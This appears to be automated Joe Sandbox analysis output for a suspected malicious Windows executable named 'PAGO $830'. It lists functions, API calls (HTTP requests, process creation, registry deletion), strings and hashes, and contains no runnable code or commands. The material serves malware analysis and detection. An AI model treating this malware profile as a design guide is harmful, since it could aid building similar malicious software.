                                                            • Part of subcall function 00D9006D: InitializeCriticalSectionAndSpinCount.KERNEL32(00E4070C,00000FA0,147F201B,?,?,?,?,00DB2353,000000FF), ref: 00D9009C
                                                            • Part of subcall function 00D9006D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00DB2353,000000FF), ref: 00D900A7
                                                            • Part of subcall function 00D9006D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00DB2353,000000FF), ref: 00D900B8
                                                            • Part of subcall function 00D9006D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D900CE
                                                            • Part of subcall function 00D9006D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D900DC
                                                            • Part of subcall function 00D9006D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D900EA
                                                            • Part of subcall function 00D9006D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D90115
                                                            • Part of subcall function 00D9006D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D90120
                                                          • ___scrt_fastfail.LIBCMT ref: 00D90067
                                                            • Part of subcall function 00D90023: __onexit.LIBCMT ref: 00D90029
                                                          Strings
                                                          • WakeAllConditionVariable, xrefs: 00D900E2
                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D900A2
                                                          • InitializeConditionVariable, xrefs: 00D900C8
                                                          • SleepConditionVariableCS, xrefs: 00D900D4
                                                          • kernel32.dll, xrefs: 00D900B3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                          • API String ID: 66158676-1714406822
                                                          • Opcode ID: f166bcedaf5e58cc8adffb732718eb5ca72c44e21bd831f18e0955a16c9f7cd3
                                                          • Instruction ID: 12b9d0e3c969b36529836a850974ad8558eb089d6a495f0b265ae8041801a36b
                                                          • Opcode Fuzzy Hash: f166bcedaf5e58cc8adffb732718eb5ca72c44e21bd831f18e0955a16c9f7cd3
                                                          • Instruction Fuzzy Hash: 61213B32A45700AFDB206BA5BC0AB693BE4DB05F61F14023AF905F72C0DB709C448A71
                                                          Function 00DD303A Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                          • API String ID: 176396367-1603158881
                                                          • Opcode ID: a62c4e54059ccf7d329bf19f96ecd7057e94da39d5955351d0f3c58072a1b3dc
                                                          • Instruction ID: 97b9ed13da92b9d359ddff543455c33fd0f873b449859f2e89174d8cb2bf7eba
                                                          • Opcode Fuzzy Hash: a62c4e54059ccf7d329bf19f96ecd7057e94da39d5955351d0f3c58072a1b3dc
                                                          • Instruction Fuzzy Hash: 85E1A332A00616ABCB189FA8D845AEDFBB5FF14710F58811BE456B7340EB30AE45D7B1
                                                          Function 00DE43DE Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharDriveLowerType
                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                          • API String ID: 2055661098-1000479233
                                                          • Opcode ID: 6193ea6b4e69143d6e9f1e349e8a98f5aa37c8c880cce594e457569755c261b0
                                                          • Instruction ID: 4af57a3a998248c6d08bc0af3dcb3974f66851a4fe1d3a571b2c6ce8bbd2005d
                                                          • Opcode Fuzzy Hash: 6193ea6b4e69143d6e9f1e349e8a98f5aa37c8c880cce594e457569755c261b0
                                                          • Instruction Fuzzy Hash: 19B1C2316083429FC710EF2AC890A6AB7E5FFA5724F54891DF59A87291E730DC45CBB2
                                                          Function 00E09010 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D8B021: GetWindowLongW.USER32(?,000000EB), ref: 00D8B032
                                                          • DragQueryPoint.SHELL32(?,?), ref: 00E09039
                                                            • Part of subcall function 00E07543: ClientToScreen.USER32(?,?), ref: 00E07569
                                                            • Part of subcall function 00E07543: GetWindowRect.USER32(?,?), ref: 00E075DF
                                                            • Part of subcall function 00E07543: PtInRect.USER32(?,?,00E08A7B), ref: 00E075EF
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E090A2
                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E090AD
                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E090D0
                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E09117
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E09130
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00E09147
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00E09169
                                                          • DragFinish.SHELL32(?), ref: 00E09170
                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E09263
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#
                                                          • API String ID: 221274066-136824727
                                                          • Opcode ID: 8052c30bde45f9b83f5b76e5e2740e96a4cb6c6669d58dfd5b4a93bb95773d1a
                                                          • Instruction ID: aae719636f73d51de2050e81fdfe63148eba6ad7431a8c9a385350ddef107c4a
                                                          • Opcode Fuzzy Hash: 8052c30bde45f9b83f5b76e5e2740e96a4cb6c6669d58dfd5b4a93bb95773d1a
                                                          • Instruction Fuzzy Hash: 5A618C71108301AFC710DF61DC85DAFBBE8FF89750F500A1EF595A21A1EB719A89CB62
                                                          Function 00DFAF20 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00DFB0BF
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB0D7
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB0FB
                                                          • _wcslen.LIBCMT ref: 00DFB127
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB13B
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB15D
                                                          • _wcslen.LIBCMT ref: 00DFB259
                                                            • Part of subcall function 00DE04C5: GetStdHandle.KERNEL32(000000F6), ref: 00DE04E4
                                                          • _wcslen.LIBCMT ref: 00DFB272
                                                          • _wcslen.LIBCMT ref: 00DFB28D
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DFB2DD
                                                          • GetLastError.KERNEL32(00000000), ref: 00DFB32E
                                                          • CloseHandle.KERNEL32(?), ref: 00DFB360
                                                          • CloseHandle.KERNEL32(00000000), ref: 00DFB371
                                                          • CloseHandle.KERNEL32(00000000), ref: 00DFB383
                                                          • CloseHandle.KERNEL32(00000000), ref: 00DFB395
                                                          • CloseHandle.KERNEL32(?), ref: 00DFB40A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 2178637699-0
                                                          • Opcode ID: b60c606bcd4774878d927dd54b3905ddc654d72bd95e7066c4f2473e3cf64155
                                                          • Instruction ID: 5ca216ccd0af2f3423c24ccca6f6b52778f22731b4ee089ab8c58ef9c7944b3b
                                                          • Opcode Fuzzy Hash: b60c606bcd4774878d927dd54b3905ddc654d72bd95e7066c4f2473e3cf64155
                                                          • Instruction Fuzzy Hash: 22F18E716043449FC714EF24C891B2ABBE1EF85324F19855EF9895B2A2DB31EC45CB72
                                                          Function 00D74C9A Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetMenuItemCount.USER32(00E41990), ref: 00DB3B6F
                                                          • GetMenuItemCount.USER32(00E41990), ref: 00DB3C1F
                                                          • GetCursorPos.USER32(?), ref: 00DB3C63
                                                          • SetForegroundWindow.USER32(00000000), ref: 00DB3C6C
                                                          • TrackPopupMenuEx.USER32(00E41990,00000000,?,00000000,00000000,00000000), ref: 00DB3C7F
                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00DB3C8B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                          • String ID: 0
                                                          • API String ID: 36266755-4108050209
                                                          • Opcode ID: e689185a6cdf7b5356a11f250551437c63a58a295213b2d2ed8da2a3a834c7f0
                                                          • Instruction ID: 781d819c5b5403ba389436e63e77f1e455eb889fb55910c8e8d07530d72b7688
                                                          • Opcode Fuzzy Hash: e689185a6cdf7b5356a11f250551437c63a58a295213b2d2ed8da2a3a834c7f0
                                                          • Instruction Fuzzy Hash: F3713331241215FEEB268F25DC49FEABF64FF04364F244206F529661E0C7B1A950EBA4
                                                          Function 00E06BA7 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(?,?), ref: 00E06CB9
                                                            • Part of subcall function 00D784E7: _wcslen.LIBCMT ref: 00D784FA
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E06D2D
                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E06D4F
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E06D62
                                                          • DestroyWindow.USER32(?), ref: 00E06D83
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D70000,00000000), ref: 00E06DB2
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E06DCB
                                                          • GetDesktopWindow.USER32 ref: 00E06DE4
                                                          • GetWindowRect.USER32(00000000), ref: 00E06DEB
                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E06E03
                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E06E1B
                                                            • Part of subcall function 00D8ADC4: GetWindowLongW.USER32(?,000000EB), ref: 00D8ADD2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                          • String ID: 0$tooltips_class32
                                                          • API String ID: 2429346358-3619404913
                                                          • Opcode ID: ade46d2491f26990f631933ab498749d0ece3b105b9cd04286671e0e38409037
                                                          • Instruction ID: 54f6c216575d32e175c230a89a319ad9bed4c4d2e9a4a31b906676248b3b419f
                                                          • Opcode Fuzzy Hash: ade46d2491f26990f631933ab498749d0ece3b105b9cd04286671e0e38409037
                                                          • Instruction Fuzzy Hash: AF71AB74100341AFD720CF18CC44BAABBF9FB89308F14151EFA85A72A0C771EA96CB12
                                                          Function 00DEC394 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DEC3CE
                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DEC3E1
                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DEC3F5
                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DEC40E
                                                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00DEC451
                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DEC467
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DEC472
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DEC4A2
                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DEC4FA
                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DEC50E
                                                          • InternetCloseHandle.WININET(00000000), ref: 00DEC519
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                          • String ID:
                                                          • API String ID: 3800310941-3916222277
                                                          • Opcode ID: 3e2a82464dedf2606fc03743b83adf85fb148535e8dffebda2460d0290ce1ce8
                                                          • Instruction ID: 9423f0b3d3360411177083b320ba26e876e707157da5c215e4263d1665877cce
                                                          • Opcode Fuzzy Hash: 3e2a82464dedf2606fc03743b83adf85fb148535e8dffebda2460d0290ce1ce8
                                                          • Instruction Fuzzy Hash: DC51BBB1110648BFDB21AF62C888ABB7BFCFF08744F14911AF945A6250D735E9499B70
                                                          Function 00E08461 Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00E05B6C,?,?), ref: 00E08484
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00E05B6C,?,?,00000000,?), ref: 00E08494
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00E05B6C,?,?,00000000,?), ref: 00E0849F
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00E05B6C,?,?,00000000,?), ref: 00E084AC
                                                          • GlobalLock.KERNEL32(00000000), ref: 00E084BA
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E05B6C,?,?,00000000,?), ref: 00E084C9
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00E084D2
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00E05B6C,?,?,00000000,?), ref: 00E084D9
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E05B6C,?,?,00000000,?), ref: 00E084EA
                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E0FC54,?), ref: 00E08503
                                                          • GlobalFree.KERNEL32(00000000), ref: 00E08513
                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00E08533
                                                          • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00E08563
                                                          • DeleteObject.GDI32(00000000), ref: 00E0858B
                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00E085A1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                          • String ID:
                                                          • API String ID: 3840717409-0
                                                          • Opcode ID: 1640d763144df822cd35645377cba5206fbb8e3cbcd82346b6b5e9510b65a854
                                                          • Instruction ID: 52eefdff00dd8a3026abd8c2d05cf0381adbf1083ba0fac20a5f3d1b023503b2
                                                          • Opcode Fuzzy Hash: 1640d763144df822cd35645377cba5206fbb8e3cbcd82346b6b5e9510b65a854
                                                          • Instruction Fuzzy Hash: 08417C71600204AFDB10CFA5DC88EAE7BB8FF89715F208158F955E72A0DB719D85CB20
                                                          Function 00DE13DB Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(00000000), ref: 00DE1420
                                                          • VariantCopy.OLEAUT32(?,?), ref: 00DE1429
                                                          • VariantClear.OLEAUT32(?), ref: 00DE1435
                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00DE1519
                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 00DE1575
                                                          • VariantInit.OLEAUT32(?), ref: 00DE1626
                                                          • SysFreeString.OLEAUT32(?), ref: 00DE16AA
                                                          • VariantClear.OLEAUT32(?), ref: 00DE16F6
                                                          • VariantClear.OLEAUT32(?), ref: 00DE1705
                                                          • VariantInit.OLEAUT32(00000000), ref: 00DE1741
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                          • API String ID: 1234038744-3931177956
                                                          • Opcode ID: 11a6329fd96bbabb737707748c94460af54b7432389e109a42c0a2ae8e9a7bf5
                                                          • Instruction ID: c4e8e083c6a132271374ab8557f2e460a86312da06a39e14e12c2100f724c724
                                                          • Opcode Fuzzy Hash: 11a6329fd96bbabb737707748c94460af54b7432389e109a42c0a2ae8e9a7bf5
                                                          • Instruction Fuzzy Hash: 7FD1FC75B00255EBCB10BF66D884BB9B7B4FF09700F24815AE599AB281DB70EC44DBB1
                                                          Function 00DFB535 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                            • Part of subcall function 00DFC8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DFB5D5,?,?), ref: 00DFC8DC
                                                            • Part of subcall function 00DFC8BF: _wcslen.LIBCMT ref: 00DFC918
                                                            • Part of subcall function 00DFC8BF: _wcslen.LIBCMT ref: 00DFC98F
                                                            • Part of subcall function 00DFC8BF: _wcslen.LIBCMT ref: 00DFC9C5
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DFB61B
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DFB699
                                                          • RegDeleteValueW.ADVAPI32(?,?), ref: 00DFB731
                                                          • RegCloseKey.ADVAPI32(?), ref: 00DFB7A5
                                                          • RegCloseKey.ADVAPI32(?), ref: 00DFB7C3
                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00DFB819
                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DFB82B
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DFB849
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00DFB8AA
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00DFB8BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 146587525-4033151799
                                                          • Opcode ID: f25ebc7ffe8aac52c4e886cdb16c86873c978bceff50fd782e3b42caedb540c7
                                                          • Instruction ID: 7e56402090d25e9345740e5753331f8fb9658f88320b4c884ed0876c4cdef495
                                                          • Opcode Fuzzy Hash: f25ebc7ffe8aac52c4e886cdb16c86873c978bceff50fd782e3b42caedb540c7
                                                          • Instruction Fuzzy Hash: 1CC19C30208245AFD710DF25C484F2ABBE5FF84328F19C59DE5998B2A2DB71ED45CBA1
                                                          Function 00DF2483 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 00DF24FF
                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00DF250F
                                                          • CreateCompatibleDC.GDI32(?), ref: 00DF251B
                                                          • SelectObject.GDI32(00000000,?), ref: 00DF2528
                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00DF2594
                                                          • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00DF25D3
                                                          • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00DF25F7
                                                          • SelectObject.GDI32(?,?), ref: 00DF25FF
                                                          • DeleteObject.GDI32(?), ref: 00DF2608
                                                          • DeleteDC.GDI32(?), ref: 00DF260F
                                                          • ReleaseDC.USER32(00000000,?), ref: 00DF261A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
